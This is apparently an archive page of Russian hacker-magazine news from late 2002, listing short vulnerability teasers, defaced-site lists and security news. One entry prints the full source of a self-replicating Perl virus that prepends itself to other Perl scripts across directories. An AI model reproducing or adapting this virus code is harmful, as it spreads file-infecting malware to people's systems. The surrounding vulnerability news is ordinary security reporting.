DoS против OSM модуля в Cisco
Optical Service Module (OSM) Line Cards, установленный на Catalyst 6500 или Cisco 7600 маршрутизаторах, работающих под Cisc…
Обход каталога в myServer
myServer – популярный Web сервер для Windows систем, написанный на С++. Планируется также перенос сервера на UNIX системы. …
Переполнение буфера при обработке PNG изображений в IE
Обнаружено две различные уязвимости в интерпретации PNG изображений в Microsoft Windows. Первая уязвимость связанна с обрабо…
Взломанные сайты: 16.12.02
Взломан:
Переполнение буфера через не исполнимый стэк в Windows
Атаки на переполнение буфера за последние 10 лет получили громадное распространение. Практически во всех современных операционных системах предусматривается защита от данных атак (Black Cat, Sun...). Поэтому не за горами то время, когда данная защита появится и у Windows систем
Множественные уязвимости в apt-www-proxy
apt-www-proxy – прокси-сервер, специально разработанный для сбора http:// архивов. Программа собирает файлы, которые были за…
Уязвимость в FTP-клиентах
Многие FTP клиенты, включая те, которые встроены в Web клиенты, могут быть уязвимы к некоторым методам обхода каталога, кото…
Игра для хакера от `Лаборатории Касперского`
"Лаборатория Касперского" приглашает пользователей принять участие в компьютерной игре "Охота на вирусы" на сайте компании и попробовать свои силы в виртуальном сражении с кибер-вредителями. Лучших игроков ждут ценные подарки к Новому Году. Специально к новогодним праздникам "Лаборатория Касперского" разместила на сайте виртуальную компьютерную игру "Охота на вирусы"
Уязвимость в python
Уязвимость, обнаруженная в python от Zack Weinberg, связанна с неправильным использованием временных имен файлов в методе …
DoS против Apple MacOS X
Mac OS X - BSD подобная операционная система от Apple Sofware.
Переполнение буфера в Enceladus Server Suite
Enceladus Server Suite - Web/FTP сервер для Windows, позволяющий безопасно организовывать общий доступ к файлам в сети. …
Переполнение буфера в PC-cillin
PC-cillin позволяет просматривать входящую электронную почту на наличие вирусов. Это достигается подключением локального поч…
Доступ к произвольному трафику в Netfilter/IPTables
Уязвимость в Netfilter/IPTables позволяет непривилегированному пользователю при определенных обстоятельствах читать ограниче…
Доступ к произвольным файлам в WebReflex
WebReflex - web-server, специально разработанный для использования на CD-ROM. Обнаруженная уязвимость позволяет удаленному а…
Повышение привилегий
Повышение привилегий в системе - вечная тема для обсуждений. Сколько эксплоитов было сделано, сколько rootkit'ов было написано, и ради чего? Кодить, кодить, кодить... Дни и ночи напролет... Каждый пытается найти уязвимость, получить права рута, получить ВСЕ! Я не понимаю откуда берется это желание
Неавторизованный доступ в APBoard
Уязвимость в APBoard позволяет неавторизованному пользователю читать сообщения внутреннего форума. Уязвимость связанна с нед…
Уязвимость прокси в InterScan VirusWall
Встроенный в TrendMicro InterScan VirusWall прокси сервер позволяет коннектится к любому хосту внутри сети.
Локальный root в Exim (pid_file_path)
Уязвимость в Exim позволяет выполнять любые команды на сервере. Ошибку можно обнаружить в исходниках daemon.c:
Эксплоит для Cobalt RaQ4
Эксплоит позволяет получить root-привилегии на системе Cobalt RaQ 4 с установленным Security Hardening Рackage (SHP).
Взломанные сайты: 10.12.2002
Взломан:
В Израиле задержан хакер
Израильская полиция при поддержке ФБР арестовала хакера, подозревающегося во взломе базы данных американской компании. В рез…
Множественные уязвимости в Ultimate PHP Board
Ultimate PHP Board - небольшой форум, написанный на PHP.
Межсайтовый скриптинг в SquirrelMail
SquirrelMail - webmail программа для Linux и Unix систем.
Межсайтовый скриптинг в разрешенных тэгах в phpBB2
phpBB - доска объявлений для UNIX и Windows систем.
Межсайтовый скриптинг в phpBB
phpBB - популярная доска объявлений для UNIX и Windows систем. Из-за недостаточной фильтрации ввода пользователя, удаленный …
Взломанные сайты: 09.12.2002
Взломан:
Удаленное переполнение буфера в Cyrus IMAP Server
Cyrus IMAPD - бесплатный, с открытым исходным кодом IMAP демон для LINUX и UNIX систем. Пользователь, подключенный к демону,…
Несколько переполнений буфера в Cyrus Sieve/libSieve
В Sieve библиотеке в Cyrus IMAP сервере обнаружено несколько опасных уязвимостей: Передавая заголовок чрезмерной длин…
DoS и утечка информации в Apache/Tomcat
Jakarta Project создает и поддерживает открытые решения на Java платформе для последующего бесплатного распространения. Tomc…
Уязвимость в Panasonic GD87
Германский сотовый оператор T-Mobile International подтвердил факт наличия уязвимости в программном обеспечении сотового тел…
ISS изменила политику
Internet Security Systems (ISS), организация, занимающаяся поиском уязвимостей в различных продуктах, объявила о смене своей…
Раскрытие информации о точке доступа в Windows XP
Обнаруженная уязвимость позволяет раскрыть список значений SSID, назначенных зарегистрированным точкам доступа и пакеты, заш…
Эксплоит WinSSLMiM
WinSSLMiM - эксплоит, реализующий нападение HTTPS "Man in the Middle". Программа содержит FakeCert, утилиту для со…
Патч для IE 5.5 и 6.0
Выпущена очередная заплата к Internet Explorer 5.5 и 6.0, которая содержит все предыдущие исправления к Internet Explorer и …
DoS против Outlook 2002
При работе с полученными почтовыми сообщениями Outlook обрабатывает информацию, содержащуюся в почтовом заголовке, которая с…
Взломанные сайты: 05.12.2002
Взломан:
Южная Корея атакует Белый Дом
В понедельник группа южнокорейских хакеров предприняла попытку взломать компьютерную сеть Белого дома, стараясь тем сам…
Вирус на Perl №2
В следующем исходнике дано решение данной проблемы: #!/usr/bin/perl # Perl - Get'em'all Virus open(File,$0); @Virus=<File>; @Virus=@Virus[0...46]; close(File); &InfectFile; if ($^0 =~ "MacOS") { chdir('::'); &InfectFile; } else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd`; chdir('..'); &InfectFile; chdir('C:\'); &SearchUpperDirectorys; chdir($OldDir);} else { $OldDir = `pwd`; chdir("/"); &SearchUpperDirectorys; chdir($OldDir);}} sub InfectFile { foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); }}}}} sub SearchUpperDirectorys { foreach $Directory (<*>) { if ((-r $Directory) && (-w &Directory ) && (-d $Directory) { chdir ($Directory); &InfectFile; chdir ('..') }}} OK, если мы в системе MacOS, то заражаем лишь низшую директорию
Недостаток в FUS механизме в Windows XP
Microsoft Windows XP содержит особенность, которая называется Fast User Switching (FUS). Эта особенность позволяет нескольки…
Ракрытие информации в SuidPerl
Suidperl - perl интерпретатор для suid perl сценариев, часть пакета perl. Уязвимость, обнаруженная в SuidPerl, позволяет ата…
Бумажный выпуск
«ХАКЕР» ДОСТУПЕН ТОЛЬКО В ЭЛЕКТРОННОЙ ВЕРСИИ
Оформи подписку — получи:
- доступ к платным материалам сайта
- доступ ко всем номерам PDF
4500 р.
на год
на год
950 р.
на месяц
на месяц
Материалы для подписчиков
Вопросы по материалам и подписке: support@glc.ru
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —
самой забойной защитой от DDoS в мире
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —самой забойной защитой от DDoS в мире